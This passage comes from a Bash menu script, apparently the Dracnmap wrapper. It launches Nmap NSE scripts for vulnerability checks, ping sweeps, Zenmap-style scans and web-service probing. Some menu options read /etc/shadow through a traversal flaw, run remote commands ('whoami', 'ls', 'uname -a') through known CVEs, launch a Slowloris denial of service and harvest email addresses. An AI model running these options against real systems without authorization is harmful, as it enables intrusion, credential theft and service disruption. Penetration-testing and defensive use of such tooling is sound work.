sgr0 2232 | read ip 2233 | $urxvt -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn $ip & 2234 | elif test $vuln == '38' 2235 | then 2236 | echo 2237 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2238 | read ip 2239 | $urxvt --script http-trace -d $ip & 2240 | elif test $vuln == '39' 2241 | then 2242 | echo 2243 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2244 | read ip 2245 | $urxvt --script http-vmware-path-vuln -p80,443,8222,8333 $ip & 2246 | elif test $vuln == '40' 2247 | then 2248 | echo 2249 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2250 | read ip 2251 | $urxvt -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow $ip & 2252 | elif test $vuln == '41' 2253 | then 2254 | echo 2255 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2256 | read ip 2257 | $urxvt --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' $ip & 2258 | elif test $vuln == '42' 2259 | then 2260 | echo 2261 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2262 | read ip 2263 | $urxvt --script http-vuln-cve2010-2861 $ip & 2264 | elif test $vuln == '43' 2265 | then 2266 | echo 2267 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2268 | read ip 2269 | $urxvt --script http-vuln-cve2011-3192.nse [--script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443 $ip & 2270 | elif test $vuln == '44' 2271 | then 2272 | echo 2273 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2274 | read ip 2275 | $urxvt --script http-vuln-cve2011-3368 $ip & 2276 | elif test $vuln == '45' 2277 | then 2278 | echo 2279 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2280 | read ip 2281 | $urxvt -sV --script http-vuln-cve2012-1823 $ip & 2282 | elif test $vuln == '46' 2283 | then 2284 | echo 2285 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2286 | read ip 2287 | $urxvt -sV --script http-vuln-cve2013-0156 $ip & 2288 | elif test $vuln == '47' 2289 | then 2290 | echo 2291 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2292 | read ip 2293 | $urxvt -p80 --script http-rompager-xss $ip & 2294 | elif test $vuln == '48' 2295 | then 2296 | echo 2297 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2298 | read ip 2299 | $urxvt -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra $ip & 2300 | elif test $vuln == '49' 2301 | then 2302 | echo 2303 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2304 | read ip 2305 | $urxvt -p 443 --script http-vuln-cve2014-2126 $ip & 2306 | elif test $vuln == '50' 2307 | then 2308 | echo 2309 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2310 | read ip 2311 | $urxvt -p 443 --script http-vuln-cve2014-2127 $ip & 2312 | elif test $vuln == '51' 2313 | then 2314 | echo 2315 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2316 | read ip 2317 | $urxvt -p 443 --script http-vuln-cve2014-2128 $ip & 2318 | elif test $vuln == '52' 2319 | then 2320 | echo 2321 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2322 | read ip 2323 | $urxvt -p 443 --script http-vuln-cve2014-2129 $ip & 2324 | elif test $vuln == '53' 2325 | then 2326 | echo 2327 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2328 | read ip 2329 | $urxvt --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false $ip & 2330 | elif test $vuln == '54' 2331 | then 2332 | echo 2333 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2334 | read ip 2335 | $urxvt --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" $ip & 2336 | elif test $vuln == '55' 2337 | then 2338 | echo 2339 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2340 | read ip 2341 | $urxvt --script=http-vuln-cve2015-1427 --script-args command= 'ls' $ip & 2342 | elif test $vuln == '56' 2343 | then 2344 | echo 2345 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2346 | read ip 2347 | $urxvt -sV --script http-vuln-cve2015-1635 --script-args uri='/anotheruri/' $ip & 2348 | elif test $vuln == '57' 2349 | then 2350 | echo 2351 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2352 | read ip 2353 | $urxvt $ip -p 7547 --script=http-vuln-misfortune-cookie & 2354 | elif test $vuln == '58' 2355 | then 2356 | echo 2357 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2358 | read ip 2359 | $urxvt -sV --script http-vuln-wnr1000-creds $ip -p 80 & 2360 | elif test $vuln == '59' 2361 | then 2362 | echo 2363 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2364 | read ip 2365 | $urxvt -sV --script http-wordpress-users --script-args limit=50 $ip & 2366 | elif test $vuln == '60' 2367 | then 2368 | echo 2369 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2370 | read ip 2371 | $urxvt -sU --script ipmi-cipher-zero -p 623 $ip & 2372 | elif test $vuln == '61' 2373 | then 2374 | echo 2375 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2376 | read ip 2377 | $urxvt -p 6667 --script=irc-botnet-channels $ip & 2378 | elif test $vuln == '62' 2379 | then 2380 | echo 2381 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2382 | read ip 2383 | $urxvt -sV --script=irc-unrealircd-backdoor $ip & 2384 | elif test $vuln == '63' 2385 | then 2386 | echo 2387 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2388 | read ip 2389 | $urxvt -sV --script mysql-vuln-cve2012-2122 $ip & 2390 | elif test $vuln == '64' 2391 | then 2392 | echo 2393 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2394 | read ip 2395 | $urxvt -p 12345 --script netbus-auth-bypass $ip & 2396 | elif test $vuln == '65' 2397 | then 2398 | echo 2399 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2400 | read ip 2401 | $urxvt --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p $port $ip & 2402 | elif test $vuln == '66' 2403 | then 2404 | echo 2405 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2406 | read ip 2407 | $urxvt -sV --script=rdp-ms12-020 -p 3389 $ip & 2408 | elif test $vuln == '67' 2409 | then 2410 | echo 2411 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2412 | read ip 2413 | $urxvt --script=rmi-vuln-classloader -p 1099 $ip & 2414 | elif test $vuln == '68' 2415 | then 2416 | echo 2417 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2418 | read ip 2419 | $urxvt --script=samba-vuln-cve-2012-1182 -p 139 $ip & 2420 | elif test $vuln == '69' 2421 | then 2422 | echo 2423 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2424 | read ip 2425 | $urxvt -sU --script smb-vuln-conficker.nse -p T:139 $ip & 2426 | elif test $vuln == '70' 2427 | then 2428 | echo 2429 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2430 | read ip 2431 | $urxvt -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 $ip & 2432 | elif test $vuln == '71' 2433 | then 2434 | echo 2435 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2436 | read ip 2437 | $urxvt -sU --script smb-vuln-ms06-025.nse -p U:137,T:139 $ip & 2438 | elif test $vuln == '72' 2439 | then 2440 | echo 2441 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2442 | read ip 2443 | $urxvt -sU --script smb-vuln-ms07-029.nse -p U:137,T:139 $ip & 2444 | elif test $vuln == '73' 2445 | then 2446 | echo 2447 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2448 | read ip 2449 | $urxvt -sU --script smb-vuln-ms08-067.nse -p U:137 $ip & 2450 | elif test $vuln == '74' 2451 | then 2452 | echo 2453 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2454 | read ip 2455 | $urxvt -p 445 $ip --script=smb-vuln-ms10-054 --script-args unsafe & 2456 | elif test $vuln == '75' 2457 | then 2458 | echo 2459 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2460 | read ip 2461 | $urxvt -p 445 $ip --script=smb-vuln-ms10-061 & 2462 | elif test $vuln == '76' 2463 | then 2464 | echo 2465 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2466 | read ip 2467 | $urxvt -sU --script smb-vuln-regsvc-dos.nse -p U:137,T:139 $ip & 2468 | elif test $vuln == '77' 2469 | then 2470 | echo 2471 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2472 | read ip 2473 | $urxvt --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 $ip & 2474 | elif test $vuln == '78' 2475 | then 2476 | echo 2477 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2478 | read ip 2479 | $urxvt --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=' -pT:25,465,587 $ip & 2480 | elif test $vuln == '79' 2481 | then 2482 | echo 2483 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2484 | read ip 2485 | $urxvt --script=smtp-vuln-cve2011-1764 -pT:25,465,587 $ip & 2486 | elif test $vuln == '80' 2487 | then 2488 | echo 2489 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2490 | read ip 2491 | $urxvt -p 443 --script ssl-ccs-injection $ip & 2492 | elif test $vuln == '81' 2493 | then 2494 | echo 2495 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2496 | read ip 2497 | $urxvt -p 443 --script ssl-cert-intaddr $ip & 2498 | elif test $vuln == '82' 2499 | then 2500 | echo 2501 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2502 | read ip 2503 | $urxvt --script ssl-dh-params $ip & 2504 | elif test $vuln == '83' 2505 | then 2506 | echo 2507 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2508 | read ip 2509 | $urxvt -p 443 --script ssl-heartbleed $ip & 2510 | elif test $vuln == '84' 2511 | then 2512 | echo 2513 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2514 | read ip 2515 | $urxvt --script ssl-known-key -p 443 $ip & 2516 | elif test $vuln == '85' 2517 | then 2518 | echo 2519 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2520 | read ip 2521 | $urxvt -sV --version-light --script ssl-poodle -p 443 $ip & 2522 | elif test $vuln == '86' 2523 | then 2524 | echo 2525 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2526 | read ip 2527 | $urxvt -sV --script=sslv2-drown $ip & 2528 | elif test $vuln == '87' 2529 | then 2530 | echo 2531 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2532 | read ip 2533 | $urxvt -p49152 --script supermicro-ipmi-conf $ip & 2534 | elif test $vuln == '88' 2535 | then 2536 | echo 2537 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2538 | read ip 2539 | $urxvt -sU -p 17185 --script wdb-version $ip & 2540 | elif test $vuln == '89' 2541 | then 2542 | nse 2543 | else 2544 | echo "" 2545 | echo -e $okegreen " Incorrect Number" 2546 | fi 2547 | echo "" 2548 | echo "" 2549 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 2550 | read back 2551 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 2552 | then 2553 | clear 2554 | menu 2555 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 2556 | then 2557 | vuln 2558 | fi 2559 | } 2560 | 2561 | 2562 | function nse () { 2563 | clear 2564 | echo -e $okegreen " " 2565 | echo " ) * ( ( ( ( ( "; 2566 | echo " ( /( ( \ ( )\ ) )\ ) ( )\ ))\ ))\ ) * ) "; 2567 | echo " )\()))\))( )\ (()/( (()/( )\ (()/(()/(()/(\ ) /( "; 2568 | echo "((_)\((_)()((((_)( /(_)) /(_)|((_) /(_))(_))(_))( )(_)) "; 2569 | echo " _((_|_()((_)\ _ )\(_)) (_)) )\___(_))(_))(_)) (_(_()) "; 2570 | echo "| \| | \/ (_)_\(_) _ \ / __((/ __| _ \_ _| _ \|_ _| "; 2571 | echo "| .\ | |\/| |/ _ \ | _/ \__ \| (__| /| || _/ | | "; 2572 | echo "|_|\_|_| |_/_/ \_\|_| |___/ \___|_|_\___|_| |_| "; 2573 | echo " "; 2574 | echo -e $red" Nmap Script Engine - Advanced Scanning with Nmap Script " 2575 | 2576 | echo -e $white " " 2577 | echo -e $white" [$okegreen"01"$white]$cyan auth-category " 2578 | echo -e $white" [$okegreen"02"$white]$cyan broadcast-category " 2579 | echo -e $white" [$okegreen"03"$white]$cyan brute-category " 2580 | echo -e $white" [$okegreen"04"$white]$cyan exploit-category " 2581 | echo -e $white" [$okegreen"05"$white]$cyan fuzzer-category " 2582 | echo -e $white" [$okegreen"06"$white]$cyan malware-category " 2583 | echo -e $white" [$okegreen"07"$white]$cyan vuln-category " 2584 | echo -e $white" [$okegreen"08"$white]$cyan back to menu " 2585 | echo 2586 | echo -n -e $red' \033[4mScreetsec@nse:\033[0m>> '; tput sgr0 #insert your choice 2587 | read ceh 2588 | if test $ceh == '1' 2589 | then 2590 | clear 2591 | auth 2592 | elif test $ceh == '2' 2593 | then 2594 | clear 2595 | brd 2596 | elif test $ceh == '3' 2597 | then 2598 | clear 2599 | brutense 2600 | elif test $ceh == '4' 2601 | then 2602 | clear 2603 | exploit 2604 | elif test $ceh == '5' 2605 | then 2606 | clear 2607 | fuzzer 2608 | elif test $ceh == '6' 2609 | then 2610 | echo 2611 | clear 2612 | malware 2613 | elif test $ceh == '7' 2614 | then 2615 | echo 2616 | clear 2617 | vuln 2618 | elif test $ceh == '8' 2619 | then 2620 | menu 2621 | else 2622 | echo "" 2623 | echo -e $okegreen " Incorrect Number" 2624 | fi 2625 | echo "" 2626 | echo "" 2627 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 2628 | read back 2629 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 2630 | then 2631 | clear 2632 | menu 2633 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 2634 | then 2635 | nse 2636 | fi 2637 | } 2638 | 2639 | ################################################ 2640 | # PING PING BEBEB 2641 | ################################################ 2642 | function pingbebeb() { 2643 | echo -e $okegreen " " 2644 | clear 2645 | echo " " 2646 | echo " " 2647 | echo "" 2648 | echo " \|/ " 2649 | echo " .-*- " 2650 | echo " / /|\ " 2651 | echo " _L_ " 2652 | echo " , . " 2653 | echo -e $okegreen" (\ / O O \ /) $red ______ _______ _______ _______ __ __ " 2654 | echo -e $okegreen" \| _ |/ $red | __ \_ _| | | __| | | | " 2655 | echo -e $okegreen" \ (_) / $red | __/_| |_| | | | |__|__| " 2656 | echo -e $okegreen" _/.___,\_ $red |___| |_______|__|____|_______| |__|__| " 2657 | echo -e $okegreen" (_/ alf \_) " 2658 | echo -e $white " " 2659 | echo -e $white" [$okegreen"01"$white]$cyan BROADCAST PING " 2660 | echo -e $white" [$okegreen"02"$white]$cyan TCP SYN PING SCANS " 2661 | echo -e $white" [$okegreen"03"$white]$cyan TCP ACK PING SCANS " 2662 | echo -e $white" [$okegreen"04"$white]$cyan UDP PING SCANS " 2663 | echo -e $white" [$okegreen"05"$white]$cyan ICMP PING SCANS " 2664 | echo -e $white" [$okegreen"06"$white]$cyan IP PROTOCOL PING SCANS " 2665 | echo -e $white" [$okegreen"07"$white]$cyan BACK " 2666 | echo -e " " 2667 | echo -n -e $red' \033[4mScreetsec@PING!:\033[0m>> '; tput sgr0 #insert your choice 2668 | read DrS 2669 | 2670 | if test $DrS == '1' 2671 | then 2672 | echo -e $cyan"" 2673 | echo -n " What is your IP Target or Host: " ; tput sgr0 2674 | read ip 2675 | $urxvt --script broadcast-ping --script-args broadcast-ping.num_probes=5 $ip & 2676 | pingbebeb 2677 | elif test $DrS == '2' 2678 | then 2679 | echo -e $cyan"" 2680 | echo -n " What is your IP Target or Host: " ; tput sgr0 2681 | read ip 2682 | $urxvt -sP -PS $ip & 2683 | pingbebeb 2684 | elif test $DrS == '3' 2685 | then 2686 | echo -e $cyan"" 2687 | echo -n " What is your IP Target or Host: " ; tput sgr0 2688 | read ip 2689 | $urxvt -sP -PA $ip & 2690 | pingbebeb 2691 | elif test $DrS == '4' 2692 | then 2693 | echo -e $cyan"" 2694 | echo -n " What is your IP Target or Host: " ; tput sgr0 2695 | read ip 2696 | $urxvt -sP -PU $ip & 2697 | pingbebeb 2698 | elif test $DrS == '5' 2699 | then 2700 | echo -e $cyan"" 2701 | echo -n " What is your IP Target or Host: " ; tput sgr0 2702 | read ip 2703 | $urxvt -sP -PE $ip & 2704 | pingbebeb 2705 | elif test $DrS == '6' 2706 | then 2707 | echo -e $cyan"" 2708 | echo -n " What is your IP Target or Host: " ; tput sgr0 2709 | read ip 2710 | $urxvt -sP -PO --packet-trace $ip & 2711 | pingbebeb 2712 | elif test $DrS == '7' 2713 | then 2714 | menu 2715 | else 2716 | echo "" 2717 | echo -e $okegreen " Incorrect Number" 2718 | fi 2719 | echo "" 2720 | echo "" 2721 | echo -n -e $cyan " Back to Last Menu? ( Yes / No ) :" 2722 | read back 2723 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 2724 | then 2725 | clear 2726 | menu 2727 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 2728 | then 2729 | pingbebeb 2730 | fi 2731 | } 2732 | 2733 | 2734 | 2735 | ############################################### 2736 | # ZENMAP 2737 | ############################################### 2738 | function zenmapscript() { 2739 | clear 2740 | clear 2741 | echo "" 2742 | echo -e $okegreen" ====================================================================" 2743 | echo -e $cyan"" 2744 | echo " +--^----------,--------,-----,--------^-, " 2745 | echo -e " | $red ||||||||| -------- | O " 2746 | echo -e $cyan" +---------------------------^----------| " 2747 | echo -e $cyan" \_,---------,---------,--------------' " 2748 | echo -e " / $red"XXXXXX"$cyan /'| /' " 2749 | echo -e " / $red"XXXXXX"$cyan / \ /' " 2750 | echo -e " / $red"XXXXXX"$cyan / _______/ " 2751 | echo -e " / $red"XXXXXX"$cyan / " 2752 | echo -e " / $red"XXXXXX"$cyan / " 2753 | echo " (________( " 2754 | echo -e " ------' $red DOUBLE KILL !! GO GO GO !! " 2755 | echo "" 2756 | echo -e $okegreen" =====================================================================" 2757 | echo -e $cyan " Scanning Target with $red'advanced command ( Zenmap Command ) " 2758 | echo -e $okegreen" =====================================================================" 2759 | echo "" 2760 | echo "" 2761 | echo -e $white" [$okegreen"01"$white]$cyan ITENSE SCAN" 2762 | echo -e $white" [$okegreen"02"$white]$cyan ITENSE SCAN + UDP " 2763 | echo -e $white" [$okegreen"03"$white]$cyan ITENSE SCAN ALL TCP PORTS " 2764 | echo -e $white" [$okegreen"04"$white]$cyan QUICK SCAN " 2765 | echo -e $white" [$okegreen"05"$white]$cyan QUICK SCAN PLUS PLUS " 2766 | echo -e $white" [$okegreen"06"$white]$cyan QUICK TRACEROUT " 2767 | echo -e $white" [$okegreen"07"$white]$cyan COMPREHENSIVE SCAN [BEST] " 2768 | echo -e $white" [$okegreen"08"$white]$cyan BACK " 2769 | echo -e " " 2770 | echo -n -e $red' \033[4mScreetsec@Headshot:\033[0m>> '; tput sgr0 #insert your choice 2771 | read Scanning 2772 | if test $Scanning == '1' 2773 | then 2774 | echo 2775 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2776 | read ip 2777 | $urxvt -T4 -A -v $ip & 2778 | elif test $Scanning == '2' 2779 | then 2780 | echo 2781 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2782 | read ip 2783 | $urxvt -sS -sU -T4 -A -v $ip & 2784 | elif test $Scanning == '3' 2785 | then 2786 | echo 2787 | echo -ne $okegreen" What is your IP Target or Host: " ; tput sgr0 2788 | read ip 2789 | $urxvt -p 1-65535 -T4 -A -v $ip & 2790 | elif test $Scanning == '4' 2791 | then 2792 | echo 2793 | echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0 2794 | read ip 2795 | $urxvt -T4 -F $ip & 2796 | elif test $Scanning == '5' 2797 | then 2798 | echo 2799 | echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0 2800 | read ip 2801 | $urxvt -sV -T4 -O -F --version-light $ip & 2802 | elif test $Scanning == '6' 2803 | then 2804 | echo 2805 | echo -ne $okegreen " What is your IP Target or Host: "; tput sgr0 2806 | read ip 2807 | $urxvt -sn --traceroute $ip & 2808 | elif test $Scanning == '7' 2809 | then 2810 | echo 2811 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2812 | read ip 2813 | $urxvt -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip & 2814 | elif test $Scanning == '8' 2815 | then 2816 | menu 2817 | else 2818 | echo "" 2819 | echo -e $okegreen " Incorrect Number" 2820 | fi 2821 | echo "" 2822 | echo "" 2823 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 2824 | read back 2825 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 2826 | then 2827 | clear 2828 | menu 2829 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 2830 | then 2831 | zenmapscript 2832 | fi 2833 | } 2834 | 2835 | ################################################ 2836 | # PSCANNING FOR WEB SERVICE 2837 | ################################################ 2838 | function WebService() { 2839 | clear 2840 | echo -e $cyan "" 2841 | echo "" 2842 | echo -e $red " __ __ ___. _________ .__ "; 2843 | echo "/ \ / \ ____\_ |__ / _____/ ______________ _|__| ____ ____ "; 2844 | echo "\ \/\/ // __ \| __ \ \_____ \_/ __ \_ __ \ \/ / |/ ___\/ __ \ "; 2845 | echo " \ /\ ___/| \_\ \ / \ ___/| | \/\ /| \ \__\ ___/ "; 2846 | echo " \__/\ / \___ >___ / /_______ /\___ >__| \_/ |__|\___ >___ >"; 2847 | echo -e $okegreen 2848 | echo " -----------------------------------------------------------------------" 2849 | echo "" 2850 | echo -e $white" [$okegreen"01"$white]$cyan DETECTING WEB APPLICATION FIREWALLS " 2851 | echo -e $white" [$okegreen"02"$white]$cyan DETECTING POSSIBLE XST VULNERABILITIES " 2852 | echo -e $white" [$okegreen"03"$white]$cyan DETECTING OPEN RELAYS " 2853 | echo -e $white" [$okegreen"04"$white]$cyan DETECTING BACKDOOR SMTP SERVERS " 2854 | echo -e $white" [$okegreen"05"$white]$cyan DETECTING CROSS SITE SCRIPTING VULNERABILITIES " 2855 | echo -e $white" [$okegreen"06"$white]$cyan ENUMERATING USERS IN AN SMTP SERVER " 2856 | echo -e $white" [$okegreen"07"$white]$cyan DETECTING WEB SERVERS VULNERABLE TO SLOWLORIS DDOS " 2857 | echo -e $white" [$okegreen"08"$white]$cyan FINDING SQL INJECTION VULNERABILITIES " 2858 | echo -e $white" [$okegreen"09"$white]$cyan CHECK IP GEOLOCATION WITH NSE " 2859 | echo -e $white" [$okegreen"10"$white]$cyan GATHERING INFORMATION FROM WHOIS (NSE) " 2860 | echo -e $white" [$okegreen"11"$white]$cyan COLLECTING VALID EMAIL ADDRES " 2861 | echo -e $white" [$okegreen"12"$white]$cyan BACK " 2862 | echo -e " " 2863 | echo -n -e $red' \033[4mScreetsec@WebService:\033[0m>> '; tput sgr0 #insert your choice 2864 | read Scanning 2865 | if test $Scanning == '1' 2866 | then 2867 | echo 2868 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2869 | read ip 2870 | $urxvt --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 $ip & 2871 | elif test $Scanning == '2' 2872 | then 2873 | echo 2874 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2875 | read ip 2876 | nmap -sS -sU -T4 -A -v $ip 2877 | $urxvt -p80 --script http-methods,http-trace --script-args http-methods.retest $ip & 2878 | elif test $Scanning == '3' 2879 | then 2880 | echo 2881 | echo -ne $okegreen" What is your IP Target or Host: " ; tput sgr0 2882 | read ip 2883 | $urxvt -sV --script smtp-open-relay -v $ip & 2884 | elif test $Scanning == '4' 2885 | then 2886 | echo 2887 | echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0 2888 | read ip 2889 | $urxvt nmap -sn $ip 2890 | echo -e "" 2891 | $urxvt -sV --script smtp-strangeport $ip & 2892 | elif test $Scanning == '5' 2893 | then 2894 | echo 2895 | echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0 2896 | read ip 2897 | $urxvt -p80 --script http-phpself-xss,http-unsafe-output-escaping $ip & 2898 | elif test $Scanning == '6' 2899 | then 2900 | echo 2901 | echo -ne $okegreen " What is your IP Target or Host: "; tput sgr0 2902 | read ip 2903 | $urxvt -p25 –script smtp-enum-users $ip & 2904 | elif test $Scanning == '7' 2905 | then 2906 | echo 2907 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2908 | read ip 2909 | $urxvt -p80 --script http-slowloris --max-parallelism 300 $ip & 2910 | elif test $Scanning == '8' 2911 | then 2912 | echo 2913 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2914 | read ip 2915 | $urxvt -p80 --script http-sql-injection $ip & 2916 | elif test $Scanning == '9' 2917 | then 2918 | echo 2919 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2920 | read ip 2921 | $urxvt -Pn -p80 --script ip-geolocation-* $ip & 2922 | elif test $Scanning == '10' 2923 | then 2924 | echo 2925 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2926 | read ip 2927 | $urxvt -sn --script whois-ip --script-args whois.whodb=nocache $ip & 2928 | elif test $Scanning == '11' 2929 | then 2930 | echo 2931 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 2932 | read ip 2933 | $urxvt -p80 --script http-google-email,http-email-harvest $ip & 2934 | elif test $Scanning == '12' 2935 | then 2936 | menu 2937 | else 2938 | echo "" 2939 | echo -e $okegreen " Incorrect Number" 2940 | fi 2941 | echo "" 2942 | echo "" 2943 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 2944 | read back 2945 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 2946 | then 2947 | clear 2948 | menu 2949 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 2950 | then 2951 | WebService 2952 | fi 2953 | } 2954 | 2955 | 2956 | ####################################################### 2957 | # CREDITS 2958 | ####################################################### 2959 | function credits { 2960 | clear 2961 | echo -e " 2962 | \033[31m##########################################################################\033[m 2963 | Credits To 2964 | \033[31m##########################################################################\033[m" 2965 | echo 2966 | echo -e $white "Special thanks to:" 2967 | echo 2968 | echo -e $red "Dracos Linux ( www.dracos-linux.org )" 2969 | echo 2970 | echo -e $okegreen "Offensive Security for the awesome OS" 2971 | echo 2972 | echo -e $green "http://www.offensive-security.com/" 2973 | echo 2974 | echo -e $yellow "http://www.kali.org/" 2975 | echo 2976 | echo -e $cyan "http://www.kitploit.com/" 2977 | echo 2978 | echo -e $white "http://www.linuxsec.org/" 2979 | echo 2980 | echo -e $okegreen "My Friend for helpme ( Boy Suganda )" 2981 | echo 2982 | echo -e $red "Big Thanks to : http://www.github.com/" 2983 | echo 2984 | 2985 | } 2986 | 2987 | ################################################### 2988 | # Function Menu 2989 | ##################################################### 2990 | function menu() { 2991 | clear 2992 | echo -e $red "" 2993 | echo " 80G08 " 2994 | echo " 8G#G@8 " 2995 | echo " 8##0 " 2996 | echo " 0##G8 " 2997 | echo " ####08 " 2998 | echo " 8#####8 " 2999 | echo " G#####8 " 3000 | echo " 8G#####8 " 3001 | echo " #8#########0 #######8 " 3002 | echo " 8#######0 0#88##### " 3003 | echo " 8G####8 8 8#8@@8### " 3004 | echo " 8### G8 8@G###### " 3005 | echo " 8##88 8 8######8 " 3006 | echo " G##088 80G##G080 " 3007 | echo " 88000000008880# 000 " 3008 | echo " 9 0 " 3009 | echo -e $okegreen" .___ _______ "; 3010 | echo " __| _/___________ ____ \ \ _____ _____ ______ "; 3011 | echo " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ "; 3012 | echo " / /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >"; 3013 | echo " \____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ "; 3014 | echo " \/ \/ \/ \/ \/ \/|__| "; 3015 | echo "" 3016 | echo -e $cyan" Script by $white":" $red Edo Maland ( Screetsec ) " 3017 | echo -e $cyan" Version $white":" $red $Version " 3018 | echo -e $cyan" Codename $white":" $red $Codename " 3019 | echo -e $cyan" Follow me on Github $white":" $red @Screetsec " 3020 | echo -e $cyan" Dracos Linux $white":" $red dracos-linux.org " 3021 | echo -e $cyan "" 3022 | echo -e $okegreen" ========================================================= "; 3023 | echo 